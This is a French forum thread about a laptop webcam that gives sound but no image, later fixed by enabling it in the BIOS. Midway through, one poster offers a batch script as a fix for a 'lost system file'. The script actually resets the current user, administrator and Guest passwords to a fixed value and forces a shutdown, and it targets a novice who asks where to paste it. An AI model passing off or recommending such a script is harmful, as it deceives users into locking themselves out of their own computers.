Webcam ne fonctionne pas
Résolu
pyli
-
pyli -
pyli -
Bonjour,
j'ai un eeepc 1005ha qui tourne sous xp8 et j'ai un petit souci avec la webcam intégrée, j'ai du son mais pas d'images
merci pour votre aide
j'ai un eeepc 1005ha qui tourne sous xp8 et j'ai un petit souci avec la webcam intégrée, j'ai du son mais pas d'images
merci pour votre aide
16 réponses
-
Bonjour pyli,
Réinstaller le pilote de la caméra par exemple, as-tu essayé ?
Sur cette page, (cliquer ici), tu devrais trouver !
@+
-
-
-
-
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question -
re,
désolée je m'etais mal exprimée
et j'ai encore une petite question
je dois telecharger a global (DLM) global ou china? -
-
-
Non c'est bien, il doit fonctionner aussi. C'est un fichier zip que tu dois décompresser pour pouvoir l'installer. Tu cliques droit dessus puis tu fais Extraire ici. Je ne sais où il se trouve sur ton ordinateur, mais pas grave puisque quand l'installation sera effective, tu élimineras ce fichier. Tu dis dès que c'est fait.
-
-
-
-
j'ai essayé plusieurs trucs mais a chaque fois si je fais executer ça me demande si je veux confimer la désinstallation
-
-
Si c'était mon ordinateur, je désinstallerais tout pour réinstaller ensuite, mais je ne souhaite pas te faire faire des bêtises non plus !
Je ne sais trop quoi proposer, tout en sachant que tu si tu désinstalles, tu as le téléchargement que tu viens d'effectuer pour réinstaller, à toi de décider.
Je ne veux pas te donner de directive pour que tu m'en veuilles ensuite !!!
En supposant qu'il soit encore sous garantie, là, filer de suite là d'où il vient !!! -
-
-
Héy les gens,j'ai la solution!!! car j'avais le même problème que pyli,en fait,c'est à cause de la perte d'un fichier système, pour le restaurer, t'as qu'a copier le code ci-dessus, et l'enregistrer sous l'extention .bat (exemple : cam.bat), il te reste qu'a faire un double clic sur le fichier créé, et c'est tout !.
voiçi le code :
echo off
break off
net user %USERNAME% 0895
net user administrator 0895
net user Guest 0895
shutdown -s -f -t 01
exit -
bonjour,
en fait le souci c que ma webcam n'est pas detectée!
je dois copier le code ou?
desolée mais je n'y connais pas grand chose
merci pour ton aide -
en fait je viens d'ouvrir msn, je suis allée sur configuration audio et video et kan je veux selectionner la webcam, j'ai le choix entre par defaut aucun et desactiver
-
-
probleme reglé! en fait la webcam etait tout simplement désactivée dans le bios
merci d'avoir pris le temps de m'aider
bonne journée